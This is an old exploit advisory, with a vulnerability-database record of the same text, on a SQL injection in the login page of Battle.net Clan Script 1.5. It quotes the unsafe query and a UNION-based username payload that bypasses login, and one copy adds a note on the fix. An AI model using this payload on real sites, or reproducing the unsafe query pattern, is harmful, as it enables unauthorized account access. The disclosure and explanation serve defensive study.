****************************************
script : Battle.net Clan Script 1.5
file : login.php
attack : SQL injection
author : h a c k e r _ X
***************************************
code :
------------------------------------------------------------------------------------------
line 9 --> $user = $_POST['user'];
line 10--> $pass = $_POST['pass'];
.....
.....
.....
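line 21--> mysql_query("SELECT * FROM bcs_members WHERE name='$user' AND password='$pass'", $link);
note : as excerpted, $user and $pass go from $_POST straight into the query string; no escaping or parameter binding is visible (lines 11-20 are not shown here). A quote character in either field therefore ends the string literal, and the remainder of the input is parsed as SQL. The fix is a prepared statement with bound parameters (mysqli or PDO; the mysql_* functions were removed in PHP 7). The query as shown also compares the submitted password inside the WHERE clause; the password should instead be checked against a stored hash with password_verify() after the row is fetched by name.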
*******
-------------------------------------------------------------------------------------------------
exploit :
*******
Username : ' union select 0,0,0,0,0,0,0,0,0,0,0 from bcs_members/*
password : anything
***************************************************
thanks to : max007,simo64,brutalism and all Moroccan hackers
special thanks to "P Y N S S O"
***************************************************
# milw0rm.com [2007-04-09]
{"id": "SECURITYVULNS:DOC:16674", "bulletinFamily": "software", "title": "Battle.net Clan Script for PHP 1.5.1 Remote SQL Injection Vulnerability", "description": "****************************************\r\n\r\nscript : Battle.net Clan Script 1.5\r\nfile : login.php\r\nattack : injection sql\r\n\r\nauteur : h a c k e r _ X\r\n\r\n***************************************\r\n\r\ncode :\r\n------------------------------------------------------------------------------------------\r\n\r\nline 9 --> $user = $_POST['user'];\r\nline 10--> $pass = $_POST['pass'];\r\n\r\n.....\r\n.....\r\n.....\r\n\r\nline 21--> mysql_query("SELECT * FROM bcs_members WHERE name='$user' AND password='$pass'", $link);\r\n*******\r\n\r\n-------------------------------------------------------------------------------------------------\r\n\r\n\r\nexploit :\r\n*******\r\n\r\nUsername : ' union select 0,0,0,0,0,0,0,0,0,0,0 from bcs_members/*\r\npassword : enything\r\n\r\n\r\n\r\n\r\n\r\n************************************************** *\r\nthinks to : max007,simo64,brutalism and all marocains hackers\r\n\r\nspecial thinks for "P Y N S S O"\r\n\r\n************************************************** *\r\n\r\n# milw0rm.com [2007-04-09]", "published": "2007-04-11T00:00:00", "modified": "2007-04-11T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16674", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:21", "edition": 1, "viewCount": 99, "enchantments": {"score": {"value": 1.9, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7570"]}], "rev": 4}, "backreferences": {}, "exploitation": null, "vulnersScore": 1.9}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645615152, "score": 1659803227}, "_internal": {"score_hash": "e4a836d7e2fa414c38c42923c8ab8cec"}}